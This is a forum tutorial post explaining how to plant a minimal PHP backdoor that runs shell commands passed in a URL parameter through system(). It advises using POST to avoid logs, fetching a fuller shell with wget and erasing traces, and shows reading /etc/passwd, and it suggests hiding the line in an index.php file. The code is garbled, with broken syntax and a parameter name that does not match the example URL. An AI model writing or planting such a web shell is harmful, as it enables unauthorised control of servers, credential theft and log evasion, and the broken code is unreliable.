Wonder How ToGadget HacksNext RealityNull Byte
Forum Thread

Creating a Minibackdoor in PHP by Mohamed Ahmed

Sep 10, 2017 09:17 PM
636406495683832493.jpg

Hello friends, today I will explain how to backdorize a web. That is how to create a file that executes commands, either in linux or windows (depends on which server is).

This is safer since it only leaves 1 log and if you do it with POST method does not leave logs. The code would look like this:

Code: PHP

---------------------------------------------------------------------------------------------------------------------------------------------------








if ( isset ( $ _GET 'command' ) ) ;

{

$ lol = @ system ( $ _GET 'command' ) ;

echo $ lol ;

}

?>

------------------------------------------------------------------------------------------------------------------------------------------------------------

In the form we that command to run, so we have control over the server and can run any command, if you please use wget (LINUX) and upload a shell and Borras, a clear example of how it works would be this:

636406495683832493.jpg

I will explain a little the function for which our Mini Backdoor works:

System: It is a function that allows to execute commands inside a server.

In the photo what I did was to execute the command cat / etc / passwd and as you can see I executed it successfully.

Another thing we can do is put

Code: PHP

$ lol = @ system ( $ _GET 'command' ) ;

in some example index.php file and call the variable lol by url and execute the command an example would be server.com/index.php?comando=cat+%2Fetc%2Fpasswd

and would execute what is the command.

Acknowledgments: Oggy & HD_Breaker

Hope you liked it.

greetings

Related Articles

637263493835297420.jpg

How to Use Zero-Width Characters to Hide Secret Messages in Text (& Even Reveal Leaks)
636455706472146367.jpg

How to Hide DDE-Based Attacks in MS Word

Comments

No Comments Exist

Be the first, drop a comment!